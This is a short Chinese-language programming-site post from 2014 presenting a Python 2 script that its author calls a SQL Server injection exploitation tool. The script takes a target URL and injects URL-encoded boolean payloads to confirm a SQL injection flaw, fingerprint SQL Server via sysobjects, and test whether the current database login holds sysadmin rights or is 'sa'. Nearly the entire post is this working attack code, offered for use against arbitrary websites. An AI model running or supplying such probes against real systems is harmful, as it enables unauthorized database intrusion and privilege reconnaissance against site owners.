Python编写数据库SA用户检测方案_编程语言综合
2014-07-05 11:45:55
[小 大]
已经帮助:人解决问题
无聊的时候,用Python写的一个小程序,用有注入点的链接,检测当前数据库用户是否为sa,没什么技术含量。
# Code by zhaoxiaobu Email: little.bu@hotmail.com
- #-*- coding: UTF-8 -*-
- from sys import exit
- from urllib import urlopen
- from string import join,strip
- from re import search
- def is_sqlable():
- sql1="%20and%201=2"
- sql2="%20and%201=1"
- urlfile1=urlopen(url+sql1)
- urlfile2=urlopen(url+sql2)
- htmlcodes1=urlfile1.read()
- htmlcodes2=urlfile2.read()
- if not search(judge,htmlcodes1) and search(judge,htmlcodes2):
- print "[信息]恭喜!这个URL是有注入漏洞的!/n"
- print "[信息]现在判断数据库是否是SQL Server,请耐心等候....."
- is_SQLServer()
- else:
- print "[错误]你确定这个URL能用?换个别的试试吧!/n"
- def is_SQLServer():
- sql = "%20and%20exists%20(select%20*%20from%20sysobjects)"
- urlfile=urlopen(url+sql)
- htmlcodes=urlfile.read()
- if not search(judge,htmlcodes):
- print "[错误]数据库好像不是SQL Server的!/n"
- else:
- print "[信息]确认是SQL Server数据库!/n"
- print "[信息]开始检测当前数据库用户权限,请耐心等待......"
- is_sysadmin()
- def is_sysadmin():
- sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))"
- urlfile = urlopen(url+sql)
- htmlcodes = urlfile.read()
- if not search(judge,htmlcodes):
- print "[错误]当前数据库用户不具有sysadmin权限!/n"
- else:
- print "[信息]当前数据库用户具有sysadmin权限!/n"
- print "[信息]检测当前用户是不是SA,请耐心等待......"
- is_sa()
- def is_sa():
- sql = "%20and%20'sa'=(select%20System_user)";
- urlfile = urlopen(url+sql)
- htmlcodes = urlfile.read()
- if not search(judge,htmlcodes):
- print "[错误]当前数据库用户不是SA!/n"
- else:
- print "[信息]当前数据库用户是SA!/n"
- print "/n########################################################################/n"
- print " ^o^SQL Server注入利用工具^o^ "
- print " Email: little.bu@hotmail.com/n"
- print "========================================================================";
- url = raw_input('[信息]请输入一个可能有注入漏洞的链接!/nURL:')
- if url == '':
- print "[错误]提供的URL必须具有 '.asp?xxx=' 这样的格式"
- exit(1)
- judge = raw_input("[信息]请提供一个判断字符串./n判断字符串:")
- if judge == '':
- print "[错误]判断字符串不能为空!"
- exit(1)
- is_sqlable()
(责任编辑:)
